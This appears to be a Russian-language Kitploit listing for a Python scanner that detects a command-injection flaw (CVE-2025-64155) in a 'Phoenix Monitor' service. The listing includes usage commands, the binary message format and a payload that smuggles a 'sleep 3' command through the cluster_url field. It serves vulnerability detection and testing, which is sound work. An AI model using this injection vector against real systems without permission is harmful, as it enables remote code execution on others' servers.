Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-64155-hunter — CVE-2025-64155-hunter | Kitploit
Инструменты/GitHubGitHub/purehate/cve-2025-64155-hunter
РазведкаСканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubpurehate/cve-2025-64155-hunter

CVE-2025-64155-hunter

CVE-2025-64155-hunter

Репозиторий
126 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Сканер CVE-2025-64155

Сканер на Python для обнаружения уязвимости внедрения команд (CVE-2025-64155) в сервисе Phoenix Monitor.

Описание

CVE-2025-64155 — это уязвимость внедрения команд в сервисе Phoenix Monitor, позволяющая удалённое выполнение кода через параметр cluster_url в команде handleStorageRequest (идентификатор команды: 1075724911).

Уязвимость возникает, когда вводимые пользователем данные в поле cluster_url передаются в команду оболочки без надлежащей санитизации, что позволяет внедрять команды с помощью метасимволов оболочки.

Этот сканер основан на исследовании эксплойта от Horizon3AI.

Возможности

  • Обнаружение по времени: Использует безопасный, неразрушающий метод обнаружения по времени
  • Поддержка SSL/TLS: Обрабатывает SSL-соединения с обходом проверки сертификатов
  • Подробный режим: Детальный вывод для отладки
  • Проверка сервиса: Опция для проверки доступности сервиса без тестирования уязвимости

Требования

  • Python 3.6+
  • Только стандартная библиотека (без внешних зависимостей)

Использование

Базовое сканирование

root@kitploit:~
python3 scanner.py -t <target_ip>

Расширенные параметры

root@kitploit:~
# Specify custom port
python3 scanner.py -t 192.168.1.100 -p 7900

# Enable verbose output
python3 scanner.py -t 192.168.1.100 -v

# Set custom timeout
python3 scanner.py -t 192.168.1.100 --timeout 15

# Check if service is accessible (no vulnerability test)
python3 scanner.py -t 192.168.1.100 --check-only

Аргументы командной строки

  • -t, --target: IP-адрес или имя хоста цели (обязательно)
  • -p, --port: Порт сервиса Phoenix Monitor (по умолчанию: 7900)
  • --timeout: Тайм-аут соединения в секундах (по умолчанию: 10)
  • -v, --verbose: Включить подробный вывод
  • --check-only: Только проверить доступность сервиса

Как это работает

Сканер использует метод обнаружения по времени:

  1. Подключается к сервису Phoenix Monitor через SSL/TLS
  2. Отправляет команду handleStorageRequest с вредоносной нагрузкой, содержащей sleep 3 в поле cluster_url
  3. Измеряет время ответа
  4. Если ответ задерживается на ~3 секунды, цель, вероятно, уязвима (команда была выполнена)

Этот метод безопасен и не причиняет вреда — он не выполняет вредоносных команд, только безвредную команду sleep для целей обнаружения.

Пример вывода

Уязвимая цель

root@kitploit:~
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900

[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 3.12 seconds

============================================================
[+] VULNERABLE: Target appears to be vulnerable to CVE-2025-64155
[+] Details: Time-based detection: Response delayed by 3.12s (likely command injection)

Неуязвимая цель

root@kitploit:~
[*] CVE-2025-64155 Scanner
[*] Target: 192.168.1.100:7900

[*] Scanning 192.168.1.100:7900 for CVE-2025-64155...
[*] Connecting to 192.168.1.100:7900...
[*] Connected successfully
[*] Sending test payload...
[*] Received response (1024 bytes) in 0.45 seconds

============================================================
[-] NOT VULNERABLE: Target does not appear to be vulnerable
[-] Details: Response received quickly (0.45s), likely not vulnerable

Технические детали

Формат сообщения

Сканер отправляет двоичное сообщение со следующей структурой:

root@kitploit:~
[4 bytes] Message length (156)
[4 bytes] Payload length
[4 bytes] Command ID (1075724911 = 0x4018006F = handleStorageRequest)
[4 bytes] Padding/Flags (0)
[Variable] XML payload

Структура нагрузки

XML-нагрузка содержит внедрение команды в поле cluster_url:

root@kitploit:~
<TEST_STORAGE type="elastic">
    <cluster_url>http://10.0.0.1:9200 --next -o /dev/null sleep 3</cluster_url>
    ...
</TEST_STORAGE>

Отказ от ответственности

Этот инструмент предназначен только для авторизованного тестирования безопасности и исследовательских целей. Используйте его только на системах, которые вам принадлежат или на которые у вас есть явное разрешение на тестирование. Несанкционированный доступ к компьютерным системам является незаконным.

Лицензия

Лицензия MIT — подробности в файле LICENSE.

Скачать инструмент